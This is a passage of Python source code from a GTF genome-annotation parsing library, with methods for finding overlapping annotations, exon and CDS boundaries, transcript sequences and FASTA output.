if len(tx_with_longest_tx) == 1:
chosen_tx.append(tx_with_longest_tx[0])
else:
genes_with_ties.append(gene_id)
chosen_tx.append(tx_with_longest_tx[0])
assert len(chosen_tx) == len(set(chosen_tx))
return chosen_tx
def filter_transcripts_by_value(self, key, allowed_values, starting_subset=None):
# returns all entries for which the given key matches one of the allowed values
chosen_tx = []
if starting_subset == None:
starting_subset = self.transcript_to_entries.keys()
for transcript_id in starting_subset:
if sorted(self.transcript_to_entries[transcript_id])[0].get_value(key) in allowed_values:
chosen_tx.append(transcript_id)
assert len(chosen_tx) == len(set(chosen_tx))
return chosen_tx
def find_annotations_overlapping_range(self, chromosome, strand, start_position, end_position, type_restrictions=None,
type_sorting_order=['CDS', 'UTR', 'start_codon', 'stop_codon', 'Selenocysteine', 'tRNA', 'exon', 'transcript', 'gene'], bin_size=1000):
"""
:param chromosome:
:param strand:
:param start_position:
:param end_position:
:param type_restrictions:
:return: list of entries (shortest first) that overlap the given range in any way. Partially or completely.
"""
if self.chr_to_entry is None:
self.bin_entries_on_chromosome(bin_size=bin_size)
overlaps = []
for position_bin in range(int(start_position) / bin_size * bin_size, (int(end_position) / bin_size * bin_size) + bin_size, bin_size):
for entry in self.chr_to_entry[chromosome][strand][position_bin]:
if type_restrictions != None and entry.get_value('type') not in type_restrictions:
continue
#The general overlap criterion
elif start_position <= int(entry.get_value('end')) and end_position >= int(entry.get_value('start')):
overlaps.append(entry)
elif int(entry.get_value('start')) > end_position:
overlaps.sort(key=lambda x: (type_sorting_order.index(x.get_value('type')), x.length()))
return overlaps
overlaps.sort(key=lambda x: (type_sorting_order.index(x.get_value('type')), x.length()))
return overlaps
def find_smallest_annotation_at_position(self, chromosome, strand, start_position, end_position, type_restrictions=None,
type_sorting_order=['CDS', 'UTR', 'start_codon', 'stop_codon', 'Selenocysteine', 'tRNA', 'exon', 'transcript', 'gene']):
'''
Finds the smallest (smallest end-start) entry at a given position
:param chr:
:param position:
:return:
'''
#if not (start_position in self.shortest_annotations[strand][chr] and end_position in self.shortest_annotations[strand][chr][start_position]):
entries = self.find_annotations_overlapping_range(chromosome, strand, start_position, end_position, type_restrictions=type_restrictions, type_sorting_order=type_sorting_order, bin_size=1000)
if len(entries)>0:
#self.shortest_annotations[strand][chr][start_position][end_position] = entries[0]
return entries[0]
else:
#self.shortest_annotations[strand][chr][start_position][end_position] = None
return None
#return self.shortest_annotations[strand][chr][start_position][end_position]
def utr_type(self, entry):
"""
if the type of the given entry is "UTR", returns '5p_UTR' or '3p_UTR' as appropriate
:param entry:
:return:
"""
if not entry.is_type('UTR'):
return None
else:
transcript_id = entry.get_value('transcript_id')
cds_exons = self.sorted_exons(transcript_id, exon_type='CDS')
if entry.get_value('strand') == '+' and int(entry.get_value('end')) < int(cds_exons[0].get_value('start')):
return '5p_UTR'
elif entry.get_value('strand') == '-' and int(entry.get_value('start')) > int(cds_exons[0].get_value('end')):
return '5p_UTR'
else:
return '3p_UTR'
###############
# Methods for getting transcript information
###############
def spliced_length(self, transcript_id, exon_type='exon'):
"""
exon_type can be CDS or exon.
CDS wil start and end at CDS boundaries, so that's convenient
Returns lenth of transcript or cds
"""
ordered_exon_entries = self.sorted_exons(transcript_id, exon_type=exon_type)
if len(ordered_exon_entries) == 0:
return 0
transcript_length = sum([exon_entry.length() for exon_entry in ordered_exon_entries])
return transcript_length
def sorted_exons(self, transcript_id, exon_type='exon'):
"""
exon_type can be : CDS, exon, UTR, stop_codon, start_codon, or a list containing a combination therof.
CDS wil start and end at CDS boundaries, but excludes the stop codon. So need to pass ['CDS','stop_codon'] to get the full coding sequence
-Be careful not to mix annotation types that may overlap, for example exon, with any other, as you will get the wrong sequence, with duplicates.
Returns exons in annotated order, based on start position of each exon
Ordering is relative to the sense strand, so the first exon in the list will be the 5'-most exon in the transcript.
However, the "end" of the exon boundary is always larger than the 'start'
"""
transcript_entries = self.transcript_to_entries[transcript_id]
ordered_exon_entries = [entry for entry in transcript_entries if entry.is_type(exon_type)]
ordered_exon_entries.sort(key=lambda x: int(x.get_value('start')))
# if this transcript is on the minus strand, the exon order needs to be flipped
if len(ordered_exon_entries)>0:
if ordered_exon_entries[0].get_value('strand') == '+':
ordered_exon_entries.sort(key=lambda x: int(x.get_value('start')))
else:
ordered_exon_entries.sort(key=lambda x: int(x.get_value('start')), reverse=True)
return ordered_exon_entries
def transcript_sequence(self, genome_sequence, transcript_id, exon_type='exon'):
"""
exon_type can be CDS or exon.
CDS will start and end at CDS boundaries, so that's convenient
Returns sequence of transcript or cds
"""
ordered_exon_entries = self.sorted_exons(transcript_id, exon_type=exon_type)
transcript_sequence = ''.join([exon_entry.sequence(genome_sequence) for exon_entry in ordered_exon_entries])
return transcript_sequence
def exon_boundaries(self, transcript_id):
"""
:param transcript_id:
:param exon_type:
:return: list of exon start and end positions, relative to the sense transcript orientation.
Transcription start site is zero
"""
sorted_exons = self.sorted_exons(transcript_id, exon_type='exon')
starts = []
ends = []
for exon_index in range(len(sorted_exons)):
if exon_index == 0:
starts.append(0)
else:
starts.append(ends[exon_index-1]+1)
ends.append(starts[exon_index]+sorted_exons[exon_index].length()-1)
return starts, ends
def cds_boundaries(self, transcript_id):
"""
:param transcript_id:
:param exon_type:
:return: CDS start and end, relative to the sense transcript orientation.
Transcription start site is zero
"""
sorted_tx_exons = self.sorted_exons(transcript_id, exon_type=['exon'])
if self.add_3_for_stop:
sorted_CDS_exons = self.sorted_exons(transcript_id, exon_type=['CDS', 'stop_codon'])
CDS_length = self.spliced_length(transcript_id, exon_type=['CDS', 'stop_codon'])
else:
sorted_CDS_exons = self.sorted_exons(transcript_id, exon_type=['CDS'])
CDS_length = self.spliced_length(transcript_id, exon_type=['CDS'])
if len(sorted_CDS_exons) == 0:
return None, None
strand = sorted_CDS_exons[0].get_value('strand')
assert strand in ['+','-']
if strand == '+':
genomic_CDS_start = int(sorted_CDS_exons[0].get_value('start'))
#genomic_CDS_end = int(sorted_CDS_exons[-1].get_value('end'))
# now, the hard part is finding the start codon
transcript_leader_length = 0
for exon in sorted_tx_exons:
if int(exon.get_value('end')) < genomic_CDS_start:
transcript_leader_length += exon.length()
elif int(exon.get_value('start')) <= genomic_CDS_start and int(exon.get_value('end')) > genomic_CDS_start:
transcript_leader_length += genomic_CDS_start-int(exon.get_value('start'))
break
start = transcript_leader_length
end = transcript_leader_length + CDS_length-1
else:
genomic_CDS_start = int(sorted_CDS_exons[0].get_value('end'))
transcript_leader_length = 0
for exon in sorted_tx_exons:
if int(exon.get_value('start')) > genomic_CDS_start:
transcript_leader_length += exon.length()
elif int(exon.get_value('end')) >= genomic_CDS_start and int(exon.get_value('start')) < genomic_CDS_start:
transcript_leader_length += int(exon.get_value('end'))-genomic_CDS_start
break
start = transcript_leader_length
end = transcript_leader_length + CDS_length-1
return start, end
def write_transcript_sequences_to_FASTA(self, out_file, genome_sequence, transcript_ids=None, exon_type='exon'):
if transcript_ids == None:
transcript_ids = self.transcript_to_entries.keys()
if out_file.endswith('.gz'):
out_fasta = gzip.open(out_file, 'w')
else:
out_fasta = open(out_file, 'w')
for transcript_id in transcript_ids:
out_fasta.write('>%s_%s\n' % (transcript_id, sorted(self.transcript_to_entries[transcript_id])[0].get_value('gene_name')))
out_fasta.write('%s\n' % self.transcript_sequence(genome_sequence, transcript_id, exon_type=exon_type))
out_fasta.close()
class gtf_entry():
def __init__(self, gtf_file_line, parent_gtf):
#self.gtf_file_line = gtf_file_line
ll = gtf_file_line.rstrip('\n').split('\t')
self.primary_data = dict(zip(parent_gtf.fields, ll))
if 'additional' in self.primary_data:
additional_pairs = self.primary_data['additional'].split('; ')
self.secondary_data = dict([pair.split(' ') for pair in additional_pairs if pair != ''])
for key in self.secondary_data:
self.secondary_data[key] = self.secondary_data[key].strip(';').strip('"')
def __repr__(self):
return '%s %s %s %s %s %s' % (self.get_value('transcript_id'), self.get_value('type'), self.get_value('chr'), self.get_value('strand'),
self.get_value('start'), self.get_value('end'))
def is_type(self, entry_type):
"""
Check if this entry is of the given primary type (third column of gtf file), or in the given list of types
"""
if isinstance(entry_type, str):
return self.primary_data['type'] == entry_type
elif isinstance(entry_type, list):
return self.primary_data['type'] in entry_type
else:
raise Exception("entry_type should be a string or list of strings, recieved type %s" % type(entry_type))
def get_value(self, key):
assert not (key in self.primary_data and key in self.secondary_data)
if key in self.primary_data:
return self.primary_data[key]
elif key in self.secondary_data:
return self.secondary_data[key]
else:
return None
def length(self):
return (int(self.get_value('end')) - int(self.get_value('start'))) + 1
def sequence(self, genome_sequence):
"""
return the sense strand sequence of this element
This accounts for the strand information, so minus strand elements will be reverse complemented
"""
return genome_sequence.get_sequence(self.get_value('chr'), int(self.get_value('start')),
int(self.get_value('end')), self.get_value('strand'))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.